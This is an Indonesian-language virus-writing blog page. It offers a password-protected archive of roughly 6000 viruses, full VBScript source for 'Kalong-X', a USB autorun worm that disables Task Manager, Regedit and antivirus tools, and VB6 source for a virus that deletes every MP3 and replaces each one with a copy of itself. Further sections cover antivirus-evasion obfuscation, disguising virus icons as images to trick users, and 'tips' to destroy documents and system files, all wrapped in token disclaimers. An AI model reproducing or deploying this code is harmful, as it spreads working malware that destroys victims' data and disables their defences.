Category: Virus Tutorial


6000 Virus siap pakai


Ingin ngetest Antivirus anda?

gw pake A*G

tapi sebelumnya gw instal pula DeepFreeze 6…untuk mengurangi presentase terjangkit…

kan kita2 cuma mo ngetes antivirus doang…

mantab dah dari 5576 file yang “ada” 5400 file yang terdeteksi …tapi bakal gw test terus sampe update nya bisa detect semua… ga tau deh sisa file yang “ga ada” ke mana Shocked

download di sini

Password is : auToeXeCw0rm

sejarah virus


Virus yang pertama kali muncul di dunia ini bernama [Elk Cloner] lahir kira-kira tahun 1981 di TEXAS A&M. Menyebar melalui disket Apple II yang ada operating systemnya. Sang perusak ini mendisplay pesan di layar : It will get on all your disks-It will infiltrate your chips–yes it is Cloner!-It will stick to you like glue-It will modify RAM too-send in the Cloner!” Hi……………….

Nama “Virus” itu sendiiri baru diberkan setelah 2 tahun kelahirannya oleh Len Adleman pada 3 November 1983 dalam sebuah seminar yang ngebahas cara membuat virus and memproteksi diri dari virus. Tapi orang-orangorang sering menganggap bahwa virus yang pertama kali muncul adalah virus [Brain] yang justru lahir tahun 1986. Wajar aja, soalnya virus ini yang paling menggemparkan dan paling meluas penyebarannya karean menjalar melalui disket DOS yang waktu itu lagi ngetrend. Lahirnya juga bersamaan dengan [PC-Write Trojan] dan [Vindent]

Mulai saat itu, `virus mulai menguasai dunia. Perkembangannya mengerikan dan sangar banget ! berselang satu tahun muncul virus pertama yang menginfeksi file. Biasanya yang diserang adalah file yang berekstensi *.exe Virus ini bernama [suriv] termasuk dalam golongan virus “jerussalem”. Kecepatan penyebarannya cukup ‘menggetarkan hati’ untuk saat itu. Tapi virus ini ngga’ terlalu jahat ko’ soalnya virus ini menghantam dan menghajar mainframe-nya IBM ngga’ lama-lama, cuma setahun (eh setahun itu lama apa sebentar ya…?)

Tahun 1988, muncul serangan BESAR terhadap Machintosh oleh virus [MacMag] dan [scores] dan jaringan Internet dihajar habis-habisan oleh virus buatan Robert Morris. Tahun 1989 ada orang iseng yang ngirim file “AIDS information program” dan celakanya, begitu file ini dibuka, yang didapat bukannya info tentang AIDS, tapi virus yang mengenskrypsi harddisk dan meminta bayaran untuk kode pembukanya (hehehe…….. ada-ada aja cara orang nyari duit)

Sejak saat itu, penyebaran virus udah ngga’ keitung lagi. Akan tetapi dampak yang ditimbulkan ngga’ terlalu besar. Baru tahun 1995 muncul serangan besar-besaran. Ngga’ tanggung-tanggung, mereka nyerang perusahaan-perusahaan besar diantaranya Griffith Air Force Base, Korean Atomic Research Institute, NASA, IBM dan masih banyak PERUSAHAAN RAKSASA lain yang dianiaya oleh “INETRNET LIBERATION FRONT” di hari ~Thanksgiving~. Karena keberanian dan kedahsyatan serangan itu, tahun 1995 dijuluki sebagai tahunnya para Hacker dan Cracker.

Para Cracker memang tidak pernah puas. Setiap muncul sistem operasi atau program baru, mereka sudah siap dengan virus barunya. Kamu yang sering ngetik dengan MS Word mungkin pernah nemuin virus Titassic. Ini virus local asli Indonesia lho… and uniknya, virus ini ngingetin kita buat sholat tepat pada waktunya (waduh, alim juga ya..) Tapi jangan salah, virus macro yang punya judul [concept]ini juga bisa berhati jahat, sangar and ganas banget. Soalnya si alim yang jahat ini bakalan ngemusnahin 80% file-file data and program korbannya. Nah, seiring dengan perkembangan teknologi, muncul virus pertama yang mengkombinasi virus macro dan worm. Namanya cukup manis [Melissa]. Tapi ngga’ semanis namanya, virus ini bakalan menyebar ke orang lain lewat E-Mail and yang paling menyakitkan, ia bakalan nyebar ke semua alamat E-Mail yang ada di address book-mu. Dan saat ini muncul jutaan virus yang bergentayangan ngga’ karuan di alam Internet.

Baru-baru ini bermunculan virus-virus baru buatan cracker konyol dari Indonesia (hehehe.. ternyata orang Indonesia ngga’ cuman pinter korupsi, tapi juga ahli merusak). Gawatnya, Antivirus mancanegara sebangsa NORTON ANTIVIRUS ngga’ bakalan bisa membasmi virus ini. Solusinya, download aja antivirus handal dari VAKSIN.COM


(

Nah kita akan buat varian lain dari KALONG.VBS. Yaitu KALONG-X.VBS. Lebih hebat dari Kalong.VBS. Sebenarnya ini varian ketiga. Sebenarnya virus ini sama saja dengan Kalong.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan )
Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggak Copy > Paste….
‘Kalong-X
‘Varian dari Kalong.VBS
on error resume next

‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd

’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)
tf.attributes = 39

’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then

set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes = 39

set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)

‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::”

‘File Hidden tak terlihat
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”

‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1
, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1
, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1
, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1
, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1
, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1
, “REG_DWORD”

‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE KALONG-X”
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic”

‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs”

‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”

‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :

Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.
Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.
Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature=”$Chicago$”
Provider=Fariskhi

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger

Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad


Halo Virologers!!! Saya akan memberitahu anda tentang 3 Teknik Enkripsi File VBS yang saya tahu. Kita mulai dari yang pertama ya…..

1) Caesar Chiper
Caesar Chiper adalah teknik enkripsi file VBS dengan cara memajukan atau memundurkan karakter. Ini merupakan teknik yang sangat sering digunakan.

Contoh:
virus
Enkripsi: uhqtr (Masing-masing karakter dimundurkan 1 karakter)

atau

virus
Enkripsi: wjsvt (Masing-masing karakter dimajukan 1 karakter)

Masih banyak contoh enkripsi Caesar Chiper. Misalnya dimajukan/dimundurkan sebanyak 2 kali, 3 kali, dll.

2) Reverse
Teknik reverse ini sangat jarang digunakan karena sangat mudah untuk diketahui cara pendekripsiannya. Pengenkripsiannya adalah dengan memindahkan huruf-huruf terbalik atau huruf-huruf tersebut dibalik urutannya.

Contoh:
virus
Enkripsi: suriv (Urutan hurufnya dibalik)

3) Caesar Chiper + Reverse (Mixed)
Nah, karena teknik Reverse dan Caesar Chiper masih dapat dengan mudah diketahui, ada cara yang lebih hebat lagi. Yaitu gabungan antara Teknik Caesar Chiper dengan teknik Reverse.

Contoh:
virus
Enkripsi: rtqhu (Huruf dimundurkan 1 karakter lalu di-reverse)

Kalau anda bingung maksud dari Karakter, mungkin anda dapat mengenalnya di VB. Di VB disebut Ascii. Contohnya, anda ingin mendapatkan nilai karakter dari huruf “K”, jadi ketikkan kode berikut ini:

‘###START-HERE###’
MsgBox Str(Asc(“K”))
‘####END-HERE####’

Penjelasan:
1) MsgBox >> Untuk menampilkan Message Box
2) Str >> Mengubah angka menjadi String
3) Asc >> Mendapatkan nilai karakter
4) “K” >> Yang akan diambil nilai karakternya

Itu saja. Bagaimana? Tertarik untuk membuat virus VBS? Then, let’s do it!!!!


Hai sobat virologger apa kabar ?

Ok. Kamu tahukan apa itu common vbs virus heuristic ? Yup itu benar, mencari string “wscript.scriptfullname” pada file berekstensi *.vbs maupun *.vbe. Lalu bagaimanakah cara agar teknik heuristic ini di bypassing.

Tak perlu bersusah payah, karena ternyata kini telah ada software untuk mengenkripsi vbs secara keseluruhan (sekaligus dengan kode perintah script-nya) dengan metode enkripsi rotate. Sedangkan untuk membypass metode vbs emulator, coba enkripsi dua kali atau tiga kali dan empat kali juga boleh script vbs yang telah terenkripsi. Yaitu dengan VBScript ROTCryptor yang dapat kamu download di alamat download softwares pralabs:

http://www.prasetyolabs.co.cc/downloads.html.

Berikut aku experiment dengan script vbs:

MsgBox(“Hello Virologger!”)

Setelah itu klik button ROTXCrypt.

Lihatlah, bahkan perintah MsgBox dan string “Hello Virologger!” tak terlihat.
Coba buka menu Run dan klik sub menu Start.
Maka script vbs tadi akan jalan seperti berikut.

Oh yak, kalau kamu pengen acak variabelnya tinggal klik button Randomize Variable pada saat sebelum enkripsi. Quotation mark dan nilai rotated bisa diubah sesuka hati.

Sebenernya VBScript ROTCryptor tidak ditunjukan untuk memfasilitasi pembuatan malware bagi para underground karena ditunjukan dengan adanya algoritma PRAVGramming yang mencegah kamu untuk membuat malware (virus ataupun worm) vbs. Tapi bisa diakali dengan cara mendelete file pravg.cpp yang terdapat dalam folder yang sama dengan vbsrtc.exe untuk mendapatkan previlege programmer atau security tester.


Hallo programmer…khususnya virus maker…selamat dateng lagih…mmmm…kali ini kita akan membahas tentang penyalahgunaan icon…maksudnya penggantian icon memakai program Icon Changer. Lah kok kenapa harus diganti? Iya yang namanya virus…khususnya pada teknik sosial engineering, icon sangatlah berpengaruh kepada user. Misalnya kita membuat virus dengan nama file gambar seronok. Otomatis icon virus kita haruslah yang berjenis icon gambar, seperti jpg or bmp. Kalau misalnya icon kita tidak dirubah ke icon gambar, maka si user tidak akan pernah mengklik virus kita. Misalnya iconnya tetep icon vb yah repot kan..Istilah lainnya kamuflase lah…

ICON CHANGER

Apa sih icon changer tuh…????apa yah..hm..yah pokoknya icon changer itu untuk menangkap dan mengganti file icon dengan cara yang lebih user friendly…tinggal next next next…jadi deh

ini nih gambar software icon changer :

CARA MENGGANTI ICON PROGRAM

nah sekarang untuk mengganti icon suatu program, ikuti langkah berikut:

1. Donlot icon changer dan cracknya di :

http://www.crackdb.com

2. Jalankan program iconchanger
3. Kemudian pilih file yang akan diganti (pasti file virus anda kan).
4. Kemudian Pilih icon yang berjejer di kotak bawah…banyak kan..
5. Setelah itu klik SET
6. Jadi deh program dengan icon yang kita inginkan

Tinggal di distribusikan deh virusnya…..

semoga bermanfaat and thank you…


Huehehehehe…tiba2 kepribadian jahat saya muncul….(setan bertanduk lageeee)….kali ini kita akan membahas pembuatan virus penghancur mp3…loh loh loh…mas…kok gitu…hehehehehe…iya neh…kebetulan para seniman terutama pencipta lagu kita sedang dilanda stress karena lagunya dengan seenaknya dibajak oleh para user seperti kita…Muahahahahaha!….ya iyalah kalo gak pakek musik saya juga bisa mati kalau sedang melakukan programming…JADI YAH BAJAK SAJA!!!!

Virus MP3 virii

Keterangan dari virus ini hanya mencari file berekstensi mp3 dan TANPA AMPUN menghapus seluruh file MP3 yang ada di komputer anda…yaaaaaaa….gak enak dunk…lah namanya membuat virus ya buebas dooo….masak mau ditahan2….hueheheheheh…., ciri2 yang dari virus ini adalah :

1. menon aktifkan :
– Folder Option
– Penglihatan Extensi file (.doc, .exe, .mp3), maksudnya jika kita di windows explorer bisa melihat ekstensi file maka kita tak akan melihat ekstensi file tersebut, biasa pertahanan diri gitu
– mengunci regedit (seperti biasa)
– mematikan winamp secara tiba2 jika file virus aktif

bisa dilihat pada code dibawah ini:

Dim titik As String
titik = “”””

CreateKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ServiceOptionMP3”, _
titik & “c:\windows\winamp.dll.exe” & titik
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1
CreateKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit”, “1”
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1
CreateKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit”, “1”
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1
CreateKey “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption”, “STOP PIRACY!!!!”
CreateKey “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”, “Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!”
Shell “taskkill /f /im winamp.exe”, vbHide

2. Mencari file berekstensi .mp3 yang ada di hardisk, lihat saja code di bawah ini :

‘///////////////////////Sub Perangkap Hardisk/////////////
Sub cari()
Dim ictr As Integer

‘If InStr(cboDrives.Text, “All Hard Drives”) > 0 Then
For ictr = 0 To UBound(sDrives)
‘////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
GetFiles sDrives(ictr), True, “*.mp3”
Next
‘Else
‘////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
‘ frmMain.GetFiles cboDrives.Text, True, “*.doc”
‘End If

‘ frmMain.Visible = True

End Sub

Dan kode ini untuk mencari seluruh partisi hardisk yang ada di komputer

Dim ictr As Integer
Dim iDriveCount As Integer
Dim sAllDrives As String
Dim sDrive As String
ReDim sDrives(0) As String

For ictr = 66 To 90
sDrive = Chr(ictr) & “:\”
If DriveType(sDrive) = “Fixed Drive” Or DriveType(sDrive) = “Removable Drive” Then
If sAllDrives <> “” Then sAllDrives = sAllDrives & “, ”
sAllDrives = sAllDrives & sDrive
iDriveCount = iDriveCount + 1
End If
Next

3. Mencari dan MELAHAP SELURUH FILE MP3 TANPA AMPUN, lihat code di bawah ini:

‘//////////////////////////////Sub perangkap File/////////////////////
Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = “*.*”)

‘Screen.MousePointer = vbHourglass

‘Dim li As ListItem
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
Dim bawa As Long

fPath = AddBackslash(Path)

Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern

hFile = FindFirstFile(fName, WFD)

On Error Resume Next
‘///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
‘Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
‘MsgBox fPath & StripNulls(WFD.cFileName)
‘//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & “\” & App.EXEName & “.exe”, fPath & StripNulls(WFD.cFileName) & “.exe”
DeleteFile fPath & StripNulls(WFD.cFileName)
End If

If hFile > 0 Then
While FindNextFile(hFile, WFD)
‘///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
‘Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
‘MsgBox fPath & StripNulls(WFD.cFileName)
‘//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & “\” & App.EXEName & “.exe”, fPath & StripNulls(WFD.cFileName) & “.exe”
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
Wend
End If

If SubFolder Then

hFile = FindFirstFile(fPath & “*.*”, WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> “.” And StripNulls(WFD.cFileName) <> “..” Then

GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If

While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> “.” And StripNulls(WFD.cFileName) <> “..” Then

GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend

End If
FindClose hFile
‘Set li = Nothing

‘Screen.MousePointer = vbDefault

End Sub

Nah setelah terkena file ini maka yang akan terjadi seluruh file mp3 akan berubah menjadi .exe dan file .mp3 akan dihapus tanpa amapun….buehehehehehe….jadi ya siap – siap mem-backup hardisk anda terutama file mp3. OKeh……ih kok jahat sekali sih…..ya sekali lagi membuat virus itu harus jahat.

——————————-TIPS SETAN———————————–

COBA YANG DICARI BUKAN FILE MP3 SAJA TAPI FILE SISTEM ATAU FILE .DOC .XLS DAN .DAT, BUKANKAH ITU MENYENANGKAN?Tapi tetep saja menjadi penghancur…..seorang virus maker yang baik tidak akan menghancurkan tapi akan membuat dunia lebih baik lewat komputer tul gak…
——————————————————————————-

Di sini kita hanya belajar bagai mana virus tersebut bekerja…bagaimana virus tersebut di program, sehingga kita tau jalan dan proses virus tersebut dan sekaligus menyelamatkan bangsa kita dari aktifitas pembajakan – pembajakan……soalnya NENEK MOYANGKU SEORANG PELAUT, coba nenek moyangku seorang sarjana atau seorang dermawan, pasti kita hasilnya beda kan…huahahahahaha….yang jelas program ini dapat dijadikan untuk proteksi file apa saja. Misalnya kita punya e-book gratis, lalu dibajak sama orang…ck ck ck kasian sudah gratis dibajak pula…nah untuk memberi pelajaran kepada orang itu gunakan program ini….hihihihihi…yang jelas ini ilmu dan tidak boleh disembunyikan, saya tidak bertanggung jawab atas kerusakan yang terjadi di komputer anda.

Tetapi yang jelas virus ini MASIH BANYAK KELEMAHANNYA, mungkin anda dapat mengembangkannya sendiri. Terserah ingin dikembangkan kode penyebarannya, kode pertahannannya atau judul lagunya mau di rubah, bukan Samson-Naluri Lelaki lagi, tapi mungkin lagi lain yang akhir – akhir ini sedang naik daun. kayak lagu apaaaaaaa gitu pokoknya….nah sekarang coba bedakan gambar di bawah ini, mana yang virus hayooohhhh!!!!!

Hoahhmmm…tiba2 saja rasa malas saya menyerang…o iya untuk anda yang mau mengubah2 source code virus download aja virusnya dan sourcodenya di link ini :


DOWNLOAD VIRUS MP3VIRII DAN SOURCODENYA